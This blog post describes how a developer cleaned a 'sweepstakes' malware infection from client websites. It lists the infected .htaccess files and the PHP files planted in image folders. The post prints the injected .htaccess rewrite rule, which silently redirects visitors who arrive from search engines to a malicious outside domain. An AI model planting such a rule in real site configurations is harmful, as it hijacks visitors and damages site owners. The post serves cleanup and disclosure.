Fixing Sweepstakes Malware Virus

Posted on: November 23rd, 2011

This week, a client of mine ran into an issue in which their sites were sending back “Site contains malware” errors. When going to these sites through a search engine, a new URL was triggered and the user was redirected to their original search engine.

After spending some time cleaning this up I wrote the following documentation. There are already several posts on this out there, but the more posts there are, the easier it will be for someone to fix it.

Keep in mind, the sites I was fixing were not WordPress:

My Documentation of the Malware

To give you some details of what I’ve been doing and for records, I’ve been looking at our main directories to check if anything has been updated recently.

The majority of things that are infected were updated on 11/10/11. The infected files include .htaccess and usually the ‘images’ directory, in which two .php files are placed, usually named by firstname_lastname.php or firstname_firstname.php.

In the .htaccess file, I’ve found that a statement is written in that will cause a redirect whenever someone goes to the site via google, bing or any other major search engine. The code is below:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

The URL that the user is then redirected to appears in the HTML (via Javascript), and once removed alleviates the issue.

I have backed up all .htaccess files in case there are complications after the removal of the file from the directory.

The dates of the .php files were 11/07/11 and 8/23/11 I’m not sure if those dates are significant or not, but that’s when they were placed in the directories.

The .php files are always 28,278 KB.

Sites that appeared after 8/23/11 only had the 11/07/2011 .php file.

Closing Thoughts

If something like this happens to you, it’s okay to freak out. After you have finished freaking out, take a deep breath, step back from the problem and fix it. It may take some looking around in the directories, but it’s better than having your site listed as malware.

Below are some links of other posts related to this virus:
Securi Research Blog – .htaccess Redirect
Securi Research Blog – Javascript Injection

Tags: ,

previous post: Code Explosion – Week 5 next post: Quick Vignettes – After Effects